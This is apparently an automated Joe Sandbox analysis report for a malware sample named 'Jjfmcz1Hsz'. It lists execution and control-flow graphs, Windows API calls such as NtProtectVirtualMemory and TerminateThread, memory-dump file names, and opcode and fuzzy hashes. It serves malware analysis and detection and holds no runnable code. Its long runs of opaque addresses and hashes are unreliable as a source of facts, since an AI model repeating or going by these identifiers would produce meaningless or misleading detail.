                                                                                                                                                                            execution_graph 64642 1d859580 626 API calls 64780 1d8a3f9f 13 API calls 64781 1d859790 443 API calls 64647 1d818196 13 API calls 64648 1d817da0 RtlDebugPrintTimes RtlDebugPrintTimes RtlDebugPrintTimes 64784 1d8543a0 390 API calls 64650 1d81e9ac 660 API calls 64653 1d85b9b0 15 API calls 64789 1d858fbc 387 API calls 64654 1d8181c0 211 API calls 64791 1d81bfc0 16 API calls 64792 1d81e3c0 431 API calls 64655 1d821dc0 23 API calls 64657 1d85c5c6 616 API calls 64658 1d8351c0 414 API calls 64793 1d8a1fc9 652 API calls 64794 1d85bbc0 586 API calls 64795 1d8587c0 363 API calls 64797 1d819fd0 363 API calls 64798 1d823bd0 21 API calls 64799 1d8c6bde 634 API calls 64661 1d89d1d0 212 API calls 64664 1d84e9e0 383 API calls 64665 1d8569e0 220 API calls 64804 1d8173f0 11 API calls 64630 1d8629f0 LdrInitializeThunk 64670 1d855900 367 API calls 64808 1d8a330c 365 API calls 64609 1d8c8305 64622 1d862b10 LdrInitializeThunk 64609->64622 64611 1d8c834d 64614 1d8c83c4 64611->64614 64623 1d860554 11 API calls 64611->64623 64613 1d8c83ff 64614->64613 64624 1d862b90 LdrInitializeThunk 64614->64624 64616 1d8c837b 64616->64614 64625 1d8dfdce LdrInitializeThunk 64616->64625 64618 1d8c841e 64618->64614 64626 1d862ed0 LdrInitializeThunk 64618->64626 64620 1d8c8430 64620->64614 64627 1d862da0 LdrInitializeThunk 64620->64627 64622->64611 64623->64616 64624->64613 64625->64618 64626->64620 64627->64614 64812 1d84cb10 GetPEB GetPEB GetPEB GetPEB 64813 1d84c310 368 API calls 64679 1d8ac51d 13 API calls 64815 1d8d9313 18 API calls 64816 1d89d729 380 API calls 64818 1d81bf20 388 API calls 64680 1d851527 368 API calls 64682 1d858520 14 API calls 64819 1d85ab20 377 API calls 64820 1d85cb20 380 API calls 64604 1d862b20 64606 1d862b2a 64604->64606 64607 1d862b3f LdrInitializeThunk 64606->64607 64608 1d862b31 64606->64608 64683 1d86ad20 14 API calls 64824 1d858322 618 API calls 64687 1d89c920 370 API calls 64688 1d8dd527 GetPEB LdrInitializeThunk 64690 1d83d530 363 API calls 64691 1d85a130 14 API calls 64693 1d81c140 372 API calls 64828 1d81a740 451 API calls 64694 1d83e547 627 API calls 64698 1d89cd40 363 API calls 64699 1d858d4f 391 API calls 64701 1d82b950 588 API calls 64835 1d85a350 455 API calls 64703 1d85415f 365 API calls 64837 1d85bb5b 366 API calls 64704 1d857960 367 API calls 64706 1d85716d 12 API calls 64707 1d81c170 657 API calls 64840 1d821f70 388 API calls 64841 1d84a370 364 API calls 64708 1d854d70 LdrInitializeThunk 64709 1d856d70 12 API calls 64842 1d84af72 391 API calls 64844 1d84be80 363 API calls 64712 1d864880 LdrInitializeThunk RtlDebugPrintTimes 64715 1d81c090 387 API calls 64847 1d81fe90 19 API calls 64848 1d81a290 582 API calls 64849 1d82c690 GetPEB 64850 1d83d690 14 API calls 64851 1d89d69d 364 API calls 64716 1d85b890 411 API calls 64852 1d8a2e9f 415 API calls 64854 1d81bea0 374 API calls 64720 1d8200a0 625 API calls 64855 1d8206a0 391 API calls 64721 1d81e0a4 391 API calls 64857 1d85cea0 412 API calls 64859 1d8622a0 806 API calls 64628 167e057 CreateFileA 64629 167dfe8 64628->64629 64860 1d8182b0 364 API calls 64637 166a45d NtProtectVirtualMemory 64638 166a287 64637->64638 64638->64637 64639 166a20f 64638->64639 64722 1d81b0c0 455 API calls 64598 168402d TerminateThread 64599 16614f1 64598->64599 64723 1d856cc0 369 API calls 64863 1d8532c0 368 API calls 64730 1d84f4d0 375 API calls 64865 1d823ee2 23 API calls 64866 1d8172e0 362 API calls 64733 1d8258e0 900 API calls 64867 1d8612e5 379 API calls 64868 1d8466e0 462 API calls 64735 1d8554e0 211 API calls 64736 1d84acf0 372 API calls 64737 1d84ccf0 GetPEB GetPEB 64869 1d8596f0 369 API calls 64870 1d8562f0 671 API calls 64740 1d89ccf0 211 API calls 64871 1d816e00 RtlDebugPrintTimes RtlDebugPrintTimes 64873 1d84d600 790 API calls 64744 1d86100e 367 API calls 64745 1d81ec0b 657 API calls 64746 1d81640d 621 API calls 64876 1d819610 618 API calls 64747 1d829810 623 API calls 64748 1d822410 667 API calls 64750 1d862010 14 API calls 64880 1d81821b 392 API calls 64752 1d822022 223 API calls 64753 1d81b420 218 API calls 64881 1d81b620 213 API calls 64884 1d822e32 387 API calls 64756 1d81b830 614 API calls 64886 1d817a30 383 API calls 64757 1d850030 362 API calls 64888 1d856e30 14 API calls 64889 1d857a33 810 API calls 64891 1d86163c 212 API calls 64892 1d823640 376 API calls 64893 1d84ea40 395 API calls 64894 1d85f240 368 API calls 64895 1d866e40 12 API calls 64762 1d83c850 617 API calls 64764 1d869450 13 API calls 64901 1d89de50 216 API calls 64902 1d89d250 365 API calls 64765 1d817860 212 API calls 64766 1d817060 RtlDebugPrintTimes 64904 1d81b260 383 API calls 64767 1d823c60 23 API calls 64909 1d85ce70 388 API calls
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.1323895586.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1660000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                            • String ID: %(+/$%(,/$*-04$-036$ADGJ$ATW[$TWZ]$Y\_b
                                                                                                                                                                            • API String ID: 823142352-1124363501
                                                                                                                                                                            • Opcode ID: bceafad4bb1683b982e68c52871db9b3985d05c25a25bb4fa12ecd09cdf84470
                                                                                                                                                                            • Instruction ID: 92b300f6d45f85d16f2391cbb4226af42232d32a4908e888520bc67d5a3c7451
                                                                                                                                                                            • Opcode Fuzzy Hash: bceafad4bb1683b982e68c52871db9b3985d05c25a25bb4fa12ecd09cdf84470
                                                                                                                                                                            • Instruction Fuzzy Hash: 3B42DA362096D19FD3238F78CC819A6BFB5EA5736472847CAE4D18B247D723480ACBD1
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 162 166a45d NtProtectVirtualMemory 163 166a460-166a467 162->163 164 166a4dd 163->164 165 166a468 163->165 168 166a4df-166a4e0 164->168 166 166a4e1-166a4e4 165->166 167 166a469 165->167 169 166a4e6-166a4e9 166->169 167->169 170 166a46a 167->170 168->166 171 166a4ea-166a4f8 169->171 170->171 172 166a46b 170->172 171->168 173 166a4fa-166a502 171->173 174 166a3ee 172->174 175 166a46c-166a480 172->175 173->171 186 166a504 173->186 176 166a371 174->176 177 166a3ef-166a439 174->177 178 166a372 176->178 179 166a2f3-166a2f5 176->179 181 166a4b0-166a4b8 177->181 182 166a43b 177->182 183 166a373 178->183 184 166a2f7 179->184 185 166a36a-166a370 179->185 187 166a4b9-166a4d9 181->187 182->187 188 166a43d 182->188 189 166a377-166a379 183->189 184->183 190 166a2f9 184->190 185->176 185->177 191 166a45b 187->191 192 166a4db 187->192 193 166a3c2-166a3c3 188->193 194 166a43f 188->194 199 166a37e-166a390 189->199 196 166a27b 190->196 197 166a2fb 190->197 191->162 195 166a441-166a459 191->195 192->164 198 166a3c4-166a3de 193->198 194->195 195->191 201 166a262-166a26c 196->201 202 166a27c-166a27e 196->202 200 166a2fe-166a301 197->200 198->198 203 166a3e0-166a3ea 198->203 199->189 204 166a392 199->204 200->199 205 166a303 200->205 206 166a26f-166a27a 201->206 202->206 203->163 207 166a3ec 203->207 204->193 208 166a287 205->208 209 166a304-166a305 205->209 206->196 207->165 207->174 208->200 212 166a289 208->212 211 166a306 209->211 213 166a307-166a321 211->213 212->211 214 166a28b 212->214 213->213 217 166a323-166a34d 213->217 215 166a20f 214->215 216 166a28d-166a2a0 214->216 215->201 217->193 218 166a34f 217->218 219 166a362-166a369 218->219 220 166a351-166a361 218->220 220->219
                                                                                                                                                                            APIs
                                                                                                                                                                            • NtProtectVirtualMemory.NTDLL ref: 0166A45D
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.1323895586.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1660000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MemoryProtectVirtual
                                                                                                                                                                            • String ID: 0369$@CFJ
                                                                                                                                                                            • API String ID: 2706961497-3323978882
                                                                                                                                                                            • Opcode ID: 0c35df1bb2d770a0eac9777c22ee18e718a3ced425582f35874d4032b549f94e
                                                                                                                                                                            • Instruction ID: 475542e61afba944ca9c7429e8d80ad27d4547912c36db9eccf9f43909774f71
                                                                                                                                                                            • Opcode Fuzzy Hash: 0c35df1bb2d770a0eac9777c22ee18e718a3ced425582f35874d4032b549f94e
                                                                                                                                                                            • Instruction Fuzzy Hash: 9571DF765067A19FC7228AACCC415A57F7DFB52370768438EE491E7297D3514803C7D2
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 221 168402d-168403f TerminateThread call 166b665 223 1684044-1684053 221->223 224 1684059-168411e 223->224 225 1684147-1684176 223->225 229 1684124-1684144 224->229 230 1661618-166161d 224->230 227 1684178-16841ae 225->227 228 16841c7-16841ce 225->228 229->225 231 1661603-1661617 230->231 232 166161f-1661629 230->232 231->230 233 166169f-16616a5 232->233 234 166162b 232->234 235 16616a7-16616b3 233->235 234->235 236 166162d 234->236 237 16615b0-16615d6 236->237 238 166162f-1661646 236->238 239 166164c-166164e 237->239 240 16615d8 237->240 241 1661655-166169d 239->241 240->241 242 16615da 240->242 241->233 244 16615dc 242->244 245 166155d-1661568 242->245 246 16615dd 244->246 247 16615e0-16615e7 245->247 248 166156a 245->248 246->247 249 16615e8-16615f8 247->249 248->249 250 166156c 248->250 249->246 251 16615fa-1661602 249->251 252 16614f1-1661510 250->252 253 166156e-1661580 250->253 251->231 252->245 253->237
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.1323895586.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1660000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: TerminateThread
                                                                                                                                                                            • String ID: $'+.$X\_b
                                                                                                                                                                            • API String ID: 1852365436-4219117020
                                                                                                                                                                            • Opcode ID: c41372e8181ec3a0f39cf68133a6f7f49ad54905622fe559967e13a58f07759f
                                                                                                                                                                            • Instruction ID: 303117fc4bba2eef139eb7e72188b98f071b1e028c797c20eb2a272a83a27676
                                                                                                                                                                            • Opcode Fuzzy Hash: c41372e8181ec3a0f39cf68133a6f7f49ad54905622fe559967e13a58f07759f
                                                                                                                                                                            • Instruction Fuzzy Hash: 6C61A9365087A69FC7229F38CC907E67FA6EF53260B68036DDCD08B296D7220947C791
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 266 1d862da0-1d862dac LdrInitializeThunk
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.1344068848.000000001D7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7F0000, based on PE: true
                                                                                                                                                                            • Associated: 0000000B.00000002.1346656449.000000001D919000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000B.00000002.1346687966.000000001D91D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d7f0000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: b7df114598a5e8b4496e2c14656f92751eff149416c80a0dfeaad415577d2b78
                                                                                                                                                                            • Instruction ID: 5e687b2e72911fdbb5da8b0ba00d753469c68af45361da6ae3c69b51da632477
                                                                                                                                                                            • Opcode Fuzzy Hash: b7df114598a5e8b4496e2c14656f92751eff149416c80a0dfeaad415577d2b78
                                                                                                                                                                            • Instruction Fuzzy Hash: 0B90022165100502D601B159450465A001A47D0341FD1C426A1114515EDA398996B133
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 267 1d862dc0-1d862dcc LdrInitializeThunk
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.1344068848.000000001D7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7F0000, based on PE: true
                                                                                                                                                                            • Associated: 0000000B.00000002.1346656449.000000001D919000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000B.00000002.1346687966.000000001D91D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d7f0000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: e8193b2e9eb5eda8dc08061e1ea01e6f1526670e922c2eb63323d9f2d4b90f17
                                                                                                                                                                            • Instruction ID: ca419b0ef609609f85092be5c822808b7e64f01c3f567b517eb87958680650bb
                                                                                                                                                                            • Opcode Fuzzy Hash: e8193b2e9eb5eda8dc08061e1ea01e6f1526670e922c2eb63323d9f2d4b90f17
                                                                                                                                                                            • Instruction Fuzzy Hash: 3C90027125100402D640B159450478A001547D0301F91C415A5154514ED67D8DD97667
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 265 1d862d10-1d862d1c LdrInitializeThunk
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.1344068848.000000001D7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7F0000, based on PE: true
                                                                                                                                                                            • Associated: 0000000B.00000002.1346656449.000000001D919000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000B.00000002.1346687966.000000001D91D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d7f0000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: 28853d3e1c74393b7c31e81b6d68d8cc8f756fe2fe8af674dba97e7f03a93570
                                                                                                                                                                            • Instruction ID: c1f22ae3b4ef177b3462f9717edc5d36fbd1a733cc4707e27c39f35d9d40a329
                                                                                                                                                                            • Opcode Fuzzy Hash: 28853d3e1c74393b7c31e81b6d68d8cc8f756fe2fe8af674dba97e7f03a93570
                                                                                                                                                                            • Instruction Fuzzy Hash: BE90023125100413D611A159460474B001947D0341FD1C816A0514518DE67A8956B123
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 264 1d862cf0-1d862cfc LdrInitializeThunk
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.1344068848.000000001D7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7F0000, based on PE: true
                                                                                                                                                                            • Associated: 0000000B.00000002.1346656449.000000001D919000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000B.00000002.1346687966.000000001D91D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d7f0000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: 542a9c47a1720f03f7e77ba30a4936df5862d7b379a5c8243c76eef88576ef55
                                                                                                                                                                            • Instruction ID: 1f726d2ea926083bdca056b240dc6cfa454c817ce8e6a5fb6c573dfbd5398159
                                                                                                                                                                            • Opcode Fuzzy Hash: 542a9c47a1720f03f7e77ba30a4936df5862d7b379a5c8243c76eef88576ef55
                                                                                                                                                                            • Instruction Fuzzy Hash: 62900221292041525A45F159450454B401657E0341BD1C416A1504910CD53A985AE623
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 262 1d862c30-1d862c3c LdrInitializeThunk
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.1344068848.000000001D7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7F0000, based on PE: true
                                                                                                                                                                            • Associated: 0000000B.00000002.1346656449.000000001D919000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000B.00000002.1346687966.000000001D91D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d7f0000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: f4da030f67f50f10e4a22d846414210badce17053f06f5927ea020af0f8d26f3
                                                                                                                                                                            • Instruction ID: c1317e2219b9cbe09363e3cb5d18bbf3a0d3f1083634ce5d4593bc12e038a46a
                                                                                                                                                                            • Opcode Fuzzy Hash: f4da030f67f50f10e4a22d846414210badce17053f06f5927ea020af0f8d26f3
                                                                                                                                                                            • Instruction Fuzzy Hash: 7B90022926300002D680B159550864E001547D1302FD1D819A0105518CD939886D6323
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 263 1d862c50-1d862c5c LdrInitializeThunk
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.1344068848.000000001D7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7F0000, based on PE: true
                                                                                                                                                                            • Associated: 0000000B.00000002.1346656449.000000001D919000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000B.00000002.1346687966.000000001D91D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d7f0000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: b815c486ad22a837db1f3e87ccad4ec38211792a519f1b0e8577ff8bbd6fba61
                                                                                                                                                                            • Instruction ID: ca02ecb2c9809fdd7b9810925ff80b47e2887ef9afdaf0c0b8ca667274506edc
                                                                                                                                                                            • Opcode Fuzzy Hash: b815c486ad22a837db1f3e87ccad4ec38211792a519f1b0e8577ff8bbd6fba61
                                                                                                                                                                            • Instruction Fuzzy Hash: 2990022135100003D640B159551864A401597E1301F91D415E0504514CE939885A6223
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.1344068848.000000001D7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7F0000, based on PE: true
                                                                                                                                                                            • Associated: 0000000B.00000002.1346656449.000000001D919000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000B.00000002.1346687966.000000001D91D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d7f0000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: 212910449ffc6b519fb0c294d72e79a96f5a0d742654514f9d6396a347d4ac28
                                                                                                                                                                            • Instruction ID: 79a4e3d67029f699a1c3b5c28fe90092e16c40852cbbeaa5f5d60652b2e9ab29
                                                                                                                                                                            • Opcode Fuzzy Hash: 212910449ffc6b519fb0c294d72e79a96f5a0d742654514f9d6396a347d4ac28
                                                                                                                                                                            • Instruction Fuzzy Hash: 8C90022126180042D700A5694D14B4B001547D0303F91C519A0244514CD93988656523
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 269 1d862eb0-1d862ebc LdrInitializeThunk
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.1344068848.000000001D7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7F0000, based on PE: true
                                                                                                                                                                            • Associated: 0000000B.00000002.1346656449.000000001D919000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000B.00000002.1346687966.000000001D91D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d7f0000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: 3efde2fcb055c69ff6d33a7c241dc503d85c524ee1ddf72b47062b92589f6c66
                                                                                                                                                                            • Instruction ID: 7a4801b78e49d1b11b09956c763f837d2cc5c28b2317f3688a3f875c35317432
                                                                                                                                                                            • Opcode Fuzzy Hash: 3efde2fcb055c69ff6d33a7c241dc503d85c524ee1ddf72b47062b92589f6c66
                                                                                                                                                                            • Instruction Fuzzy Hash: 9790023125140402D600A159491474F001547D0302F91C415A1254515DD63988557573
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.1344068848.000000001D7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7F0000, based on PE: true
                                                                                                                                                                            • Associated: 0000000B.00000002.1346656449.000000001D919000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000B.00000002.1346687966.000000001D91D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d7f0000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: 7e6f513aab9520fb1fcaabfcbe8d3d82ffd5c6b3a91737ab06fa712cbfd3d9e7
                                                                                                                                                                            • Instruction ID: 15c200e1c4158c709de24a011e73170f3c39fdad026a2a3b8614cf69f2fa1b41
                                                                                                                                                                            • Opcode Fuzzy Hash: 7e6f513aab9520fb1fcaabfcbe8d3d82ffd5c6b3a91737ab06fa712cbfd3d9e7
                                                                                                                                                                            • Instruction Fuzzy Hash: 40900221651000424640B169894494A40156BE1311B91C525A0A88510DD57D88696667
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 268 1d862e50-1d862e5c LdrInitializeThunk
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.1344068848.000000001D7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7F0000, based on PE: true
                                                                                                                                                                            • Associated: 0000000B.00000002.1346656449.000000001D919000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000B.00000002.1346687966.000000001D91D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d7f0000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: 26b6a333c4e1cef50a0491c200e99fd6ec133a18760beb551fd7846932c92e4a
                                                                                                                                                                            • Instruction ID: 73257214920e5e595113fe80d242cb6a08c7c8fdfd5852b77eb224b0d6d33470
                                                                                                                                                                            • Opcode Fuzzy Hash: 26b6a333c4e1cef50a0491c200e99fd6ec133a18760beb551fd7846932c92e4a
                                                                                                                                                                            • Instruction Fuzzy Hash: 2890026139100442D600A1594514B4A001587E1301F91C419E1154514DD63DCC567127
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 258 1d8629f0-1d8629fc LdrInitializeThunk
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.1344068848.000000001D7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7F0000, based on PE: true
                                                                                                                                                                            • Associated: 0000000B.00000002.1346656449.000000001D919000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000B.00000002.1346687966.000000001D91D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d7f0000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: f5e951658982dc68582081dfad50bbf831ea8187c793f8472b1238d02b0a23d3
                                                                                                                                                                            • Instruction ID: 06c7bc9725f8343885132e2575759898df01036f8400a74ecedf02644e875416
                                                                                                                                                                            • Opcode Fuzzy Hash: f5e951658982dc68582081dfad50bbf831ea8187c793f8472b1238d02b0a23d3
                                                                                                                                                                            • Instruction Fuzzy Hash: 3A900435371000030705F55D070454F005747D53517D1C435F1105510CF735CC757133
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 260 1d862b90-1d862b9c LdrInitializeThunk
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.1344068848.000000001D7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7F0000, based on PE: true
                                                                                                                                                                            • Associated: 0000000B.00000002.1346656449.000000001D919000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000B.00000002.1346687966.000000001D91D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d7f0000_Jjfmcz1Hsz.jbxd
